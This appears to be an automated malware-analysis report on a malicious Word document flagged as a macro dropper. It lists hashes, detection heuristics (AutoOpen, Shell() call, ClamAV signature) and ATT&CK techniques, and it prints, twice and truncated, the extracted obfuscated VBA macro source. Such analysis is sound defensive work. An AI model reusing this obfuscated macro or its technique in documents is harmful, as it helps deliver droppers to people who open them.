Office (OLE) malware analysis — malicious · 9b0b9dd4e1e9e1ba

MALICIOUS

Office (OLE)

88.0 KB Created: 2017-10-16 20:18:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: fe2a18e7004c66af69f6878ba0158cdf SHA-1: 284ea64d250f45b67b06886f42bb562392e3e0a3 SHA-256: 9b0b9dd4e1e9e1baebd83b323c18aa032a9e8914e3435c94e61e47d80d5cd938

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes the Shell() function, indicating an attempt to execute an external command, likely for downloading and running a secondary payload. The ClamAV detection also points to this being a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6348953-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6348953-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12559 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12559 bytes
SHA-256: `b13d7adfe08e642bcbf4a52e03913c81dbbbdbf98a832d944577b9633f7aab32`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub mWfpoVjQv() BIJUKkDDB = "QBFC37LO3DVDM9NYEILCWSG2OFURJrCQJKWzaXhDlVNrNkktBpQovifC3N49" icjzGpwhO = Mid(BIJUKkDDB, 25, 31) MkQjQipcT = icjzGpwhO OjPAUniF = "AMUCRTQSptfYicLLUtWucJaTmDwFwjDbNN8" oAZUQ = Mid(OjPAUniF, 9, 25) aEcuakBmPJK = oAZUQ tBYAGZj = "9QAQlkRQIP6RN53WI8Z4" hmNwA = Mid(tBYAGZj, 5, 4) KcQznTiwit = hmNwA DJkSYCZhQGn = "BLfCjSRGRniqkzbF7WT4T50GLX24J" uWipwkUIF = Mid(DJkSYCZhQGn, 3, 13) GQEbApE = uWipwkUIF vNJUHoLIGXt = "THYIVRDK47WD1QNYOH1NOPOIC624FW52QWAJhwzPzwQvvjAr5Y29M" Ohhrn = Mid(vNJUHoLIGXt, 33, 16) ISmjIbS = Ohhrn UrnBviYpKWJ = "HOCH8JP49RQDjQMproSoHkfAOihjVvEEwGMfPOAkDkQDKOJ6" FiCwEu = Mid(UrnBviYpKWJ, 11, 32) RkBaYUXz = FiCwEu QwhJj = "YmrMOHCjodmzjTipiQZQOCWUMFZTMOE1OXE3" FLlNQhIfLSQ = Mid(QwhJj, 2, 26) jYjYiXf = FLlNQhIfLSQ SmOsXKwD = "MYY7R5ODjZdnhlXzonzW0TFOU" pKIBw = Mid(SmOsXKwD, 8, 13) rPJicSMk = pKIBw qlPPTcqJ = "Y81QQ994ALRBUohOGPO" KmPDFBEC = Mid(qlPPTcqJ, 13, 3) BHZcqLlr = KmPDFBEC wzcrMjCJ = "PDJ7XJCNYIFSAAUXTC7I8RClLVECGnmVqojMNwphRnqojDRSSpWrBURLAIBTYM24WO" BVGEaCzd = Mid(wzcrMjCJ, 22, 32) opdlnqZpHE = BVGEaCzd bOKXO = "CVALEJ0SRLSAY36XII2M8UK2EYSSO1EIE7INV" MrXzib = Mid(bOKXO, 31, 3) rhsUMju = MrXzib PdtozZUOlu = "7E1OFEWYZ4I1SAczQiUShbBvtEjBIEPdRoTsdUaPUbOVffEwwYRY69" kfHkkouipNj = Mid(PdtozZUOlu, 13, 40) POViGGzzVD = kfHkkouipNj zlcYiSEEb = "" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + "com" + "ments" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + VdiikDzS + ZOakl + lIGETSC + APUzbPb + iVzuTu tkSsAzikjk = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17279), 84) GFEHQNHbJ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6265), 42) olVCUHcK = Right(Left((aOtTULiNV(zlcYiSEEb)), 749), 92) CzGVtIUuLVL = Right(Left((aOtTULiNV(zlcYiSEEb)), 15055), 61) wZaYnCdc = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 48), 110) HdHfvKcHaAl = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6389), 96) wlWEn = Mid((aOtTULiNV(zlcYiSEEb)), 17859, 59) ZRWJWduioHZ = Right(Left((aOtTULiNV(zlcYiSEEb)), 18901), 74) BzsmdYki = Mid((aOtTULiNV(zlcYiSEEb)), 2111, 112) RquTcnQzpv = Mid((aOtTULiNV(zlcYiSEEb)), 14882, 73) pHwISPtS = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 4441), 102) QjDztkbO = Mid((aOtTULiNV(zlcYiSEEb)), 7575, 85) LjFSbJS = Right(Left((aOtTULiNV(zlcYiSEEb)), 15873), 148) KjZqdJkn = Right(Left((aOtTULiNV(zlcYiSEEb)), 10472), 50) VovSq = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 598), 18) PctfWb = Mid((aOtTULiNV(zlcYiSEEb)), 1068, 8) MJCfhIz = Mid((aOtTULiNV(zlcYiSEEb)), 13242, 111) IrqpZpIzGHb = Mid((aOtTULiNV(zlcYiSEEb)), 11229, 47) NOtNupC = Mid((aOtTULiNV(zlcYiSEEb)), 14805, 76) IaaRAiInwX = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17941), 85) KzjYp = Right(Left((aOtTULiNV(zlcYiSEEb)), 15382), 10) iPUYpvvnm = Mid((aOtTULiNV(zlcYiSEEb)), 3299, 78) HwBVjQ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 917), 33) paoTJD = Right(Left((aOtTULiNV(zlcYiSEEb)), 16191), 108) DPKoECR = Mid((aOtTULiNV(zlcYiSEEb)), 2950, 141) nCkVEuWT = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 1176), 132) uzpQSJh = Right(Left((aOtTULiNV(zlcYiSEEb)), 3868), 27) twKVFj = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 9362), 7) bfKFiszv = Right(Left((aOtTULiNV(zlcYiSEEb)), 1752), 65) mlfSzZmpP = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 7363), 133) riWEHQbcjfp = Mid((aOtTULiNV(zlcYiSEEb)), 13381, 42) unZLQHrU = Right(Left((aOtTULiNV(zlcYiSEEb)), 19092), 25) vMibwliPQ = Mid((aOtTULiNV( ... (truncated)

SHA-256: b13d7adfe08e642bcbf4a52e03913c81dbbbdbf98a832d944577b9633f7aab32

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub mWfpoVjQv()
BIJUKkDDB = "QBFC37LO3DVDM9NYEILCWSG2OFURJrCQJKWzaXhDlVNrNkktBpQovifC3N49"
icjzGpwhO = Mid(BIJUKkDDB, 25, 31)
MkQjQipcT = icjzGpwhO
OjPAUniF = "AMUCRTQSptfYicLLUtWucJaTmDwFwjDbNN8"
oAZUQ = Mid(OjPAUniF, 9, 25)
aEcuakBmPJK = oAZUQ
tBYAGZj = "9QAQlkRQIP6RN53WI8Z4"
hmNwA = Mid(tBYAGZj, 5, 4)
KcQznTiwit = hmNwA
DJkSYCZhQGn = "BLfCjSRGRniqkzbF7WT4T50GLX24J"
uWipwkUIF = Mid(DJkSYCZhQGn, 3, 13)
GQEbApE = uWipwkUIF
vNJUHoLIGXt = "THYIVRDK47WD1QNYOH1NOPOIC624FW52QWAJhwzPzwQvvjAr5Y29M"
Ohhrn = Mid(vNJUHoLIGXt, 33, 16)
ISmjIbS = Ohhrn
UrnBviYpKWJ = "HOCH8JP49RQDjQMproSoHkfAOihjVvEEwGMfPOAkDkQDKOJ6"
FiCwEu = Mid(UrnBviYpKWJ, 11, 32)
RkBaYUXz = FiCwEu
QwhJj = "YmrMOHCjodmzjTipiQZQOCWUMFZTMOE1OXE3"
FLlNQhIfLSQ = Mid(QwhJj, 2, 26)
jYjYiXf = FLlNQhIfLSQ
SmOsXKwD = "MYY7R5ODjZdnhlXzonzW0TFOU"
pKIBw = Mid(SmOsXKwD, 8, 13)
rPJicSMk = pKIBw
qlPPTcqJ = "Y81QQ994ALRBUohOGPO"
KmPDFBEC = Mid(qlPPTcqJ, 13, 3)
BHZcqLlr = KmPDFBEC
wzcrMjCJ = "PDJ7XJCNYIFSAAUXTC7I8RClLVECGnmVqojMNwphRnqojDRSSpWrBURLAIBTYM24WO"
BVGEaCzd = Mid(wzcrMjCJ, 22, 32)
opdlnqZpHE = BVGEaCzd
bOKXO = "CVALEJ0SRLSAY36XII2M8UK2EYSSO1EIE7INV"
MrXzib = Mid(bOKXO, 31, 3)
rhsUMju = MrXzib
PdtozZUOlu = "7E1OFEWYZ4I1SAczQiUShbBvtEjBIEPdRoTsdUaPUbOVffEwwYRY69"
kfHkkouipNj = Mid(PdtozZUOlu, 13, 40)
POViGGzzVD = kfHkkouipNj
zlcYiSEEb = "" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + "com" + "ments" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + VdiikDzS + ZOakl + lIGETSC + APUzbPb + iVzuTu
tkSsAzikjk = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17279), 84)
GFEHQNHbJ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6265), 42)
olVCUHcK = Right(Left((aOtTULiNV(zlcYiSEEb)), 749), 92)
CzGVtIUuLVL = Right(Left((aOtTULiNV(zlcYiSEEb)), 15055), 61)
wZaYnCdc = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 48), 110)
HdHfvKcHaAl = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6389), 96)
wlWEn = Mid((aOtTULiNV(zlcYiSEEb)), 17859, 59)
ZRWJWduioHZ = Right(Left((aOtTULiNV(zlcYiSEEb)), 18901), 74)
BzsmdYki = Mid((aOtTULiNV(zlcYiSEEb)), 2111, 112)
RquTcnQzpv = Mid((aOtTULiNV(zlcYiSEEb)), 14882, 73)
pHwISPtS = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 4441), 102)
QjDztkbO = Mid((aOtTULiNV(zlcYiSEEb)), 7575, 85)
LjFSbJS = Right(Left((aOtTULiNV(zlcYiSEEb)), 15873), 148)
KjZqdJkn = Right(Left((aOtTULiNV(zlcYiSEEb)), 10472), 50)
VovSq = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 598), 18)
PctfWb = Mid((aOtTULiNV(zlcYiSEEb)), 1068, 8)
MJCfhIz = Mid((aOtTULiNV(zlcYiSEEb)), 13242, 111)
IrqpZpIzGHb = Mid((aOtTULiNV(zlcYiSEEb)), 11229, 47)
NOtNupC = Mid((aOtTULiNV(zlcYiSEEb)), 14805, 76)
IaaRAiInwX = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17941), 85)
KzjYp = Right(Left((aOtTULiNV(zlcYiSEEb)), 15382), 10)
iPUYpvvnm = Mid((aOtTULiNV(zlcYiSEEb)), 3299, 78)
HwBVjQ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 917), 33)
paoTJD = Right(Left((aOtTULiNV(zlcYiSEEb)), 16191), 108)
DPKoECR = Mid((aOtTULiNV(zlcYiSEEb)), 2950, 141)
nCkVEuWT = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 1176), 132)
uzpQSJh = Right(Left((aOtTULiNV(zlcYiSEEb)), 3868), 27)
twKVFj = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 9362), 7)
bfKFiszv = Right(Left((aOtTULiNV(zlcYiSEEb)), 1752), 65)
mlfSzZmpP = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 7363), 133)
riWEHQbcjfp = Mid((aOtTULiNV(zlcYiSEEb)), 13381, 42)
unZLQHrU = Right(Left((aOtTULiNV(zlcYiSEEb)), 19092), 25)
vMibwliPQ = Mid((aOtTULiNV(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.